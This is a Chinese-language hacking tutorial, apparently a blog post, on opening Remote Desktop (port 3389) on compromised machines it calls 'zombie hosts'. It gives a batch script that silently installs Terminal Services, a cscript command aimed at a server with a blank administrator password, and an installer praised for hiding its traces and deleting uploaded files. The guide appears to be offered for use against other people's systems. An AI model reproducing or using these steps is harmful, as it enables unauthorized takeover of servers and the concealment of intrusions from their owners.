3389批量鏈接工具打開的幾種方法:

下面操做最好在iis7遠程桌面管理工具下完成，最好不要在本地服務器。

　　1，打開記事本，編輯內容以下：
　　echo [Components] > c:sql
　　echo TSEnable = on >> c:sql
　　sysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q
　　編輯好後存爲BAT文件，上傳至肉雞
，執行。這裏值得注意的是要肯定winnt是否在c盤，若是在其餘盤則須要改動。
　　2 (對xp2000都有效) 腳本文件 本地開3389 工具:rots1.05
　　使用方法：
　　在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調用腳本，例如：
　　c:>cscript ROTS.vbs <目標IP> <用戶名> <密碼> [服務端口] [自動重起選項]
　　服務端口： 設置終端服務的服務端口。默認是3389。
　　自動重起選項： 使用/r表示安裝完成後自動重起目標使設置生效。
　　使用/fr表示強制重起目標。（若是/r不行，能夠試試這個）
　　使用此參數時，端口設置不能忽略。
　　好比掃描到了一個有NT弱口令的服務器，IP地址是222.222.222.222，管理員賬戶是administrator，密碼爲空
　　運行CMD（2000下的DOS），咱們給它開終端！
　　命令以下！
　　cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
　　上面的命令應該能夠理解吧？cscript reg.vbe這是命令，後面的是IP，而後是管理員賬戶，接這是密碼，由於222.222.222.222 這臺服務器的管理員密碼是空的，那就用雙引號表示爲空，再後面是端口，你能夠任意設置終端的端口，/fr是重啓命令（強制重啓，通常我都用這個，你也能夠 /r，這是普通重啓）
　　腳本會判斷目標系統類型，若是不是server及以上版本，就會提示你是否要取消。
　　由於pro版不能安裝終端服務。
　　若是你確信腳本判斷錯誤，就繼續安裝好了。
　　若是要對本地使用，IP地址爲127.0.0.1或者一個點（用.表示），用戶名和密碼都爲空（用""表示）。
　　腳本訪問的目標的135端口，若是目標135端口未開放，或者WMI服務關閉，那麼腳本就沒用了。
　　3，下載3389自動安裝程序-djshao正式版5.0
　　說明：
　　解壓djshao5.0.zip,用你的隨便什麼方法把把解壓出來的djxyxs.exe上傳到肉雞的c:winnttemp下，而後進入 c:winnttemp目錄執行djxyxs.exe解壓縮文件，而後再執行解壓縮出來的azzd.exe文件，等一會肉雞會自動重啓！重啓後會出現終端服務！
　　特色：一、不用修改註冊表的安裝路徑，註冊表會自動修改，安裝完後會自動恢復到原來的安裝路徑，二、在後檯安靜模式運行，就算肉雞旁有人也沒有關係！三、在添加和刪除中看不出終端服務被安裝的痕跡，也就是啓動終端前不會打鉤，四、不會在肉雞上留下你的上傳文件，在安裝完終端服務後會會自動刪除你上傳到c:winnttemp下的任何文件！五、無論肉雞的winnt裝在什麼盤上都無所謂！六、安裝完終端後會刪除在管理工具中的終端快捷圖標！七、在沒有安裝終端前，終端服務是被禁止的！安裝終端後，終端服務被改成自動！可是若是在安裝前終端服務是手動！安裝後就可能仍是手動！等重啓後就不會打開服務！因此在軟件中加了sc指令，等安裝完後，無論終端服務是禁止仍是手動仍是自動，所有改成自動。八、自動檢測肉雞是否是服務器版，若是不是刪除原文件，不執行安裝，若是是服務器版就執行安裝！九、支持中日韓繁四個版本的win2000服務器版！
　　5，下載DameWare NT Utilities 3.66.0.0 註冊版
　　安裝註冊完畢後輸入對方IP用戶名密碼，等待出現是否安裝的對話框點是。
　　複製啓動後出現對方桌面。
　　在對方桌面進入控制面版，點添加或刪除程序。進入後點添加/刪除windows組件，找到終端服務，點際進入後在啓動終端服務上打上勾。肯定自動提示重起，重起後OK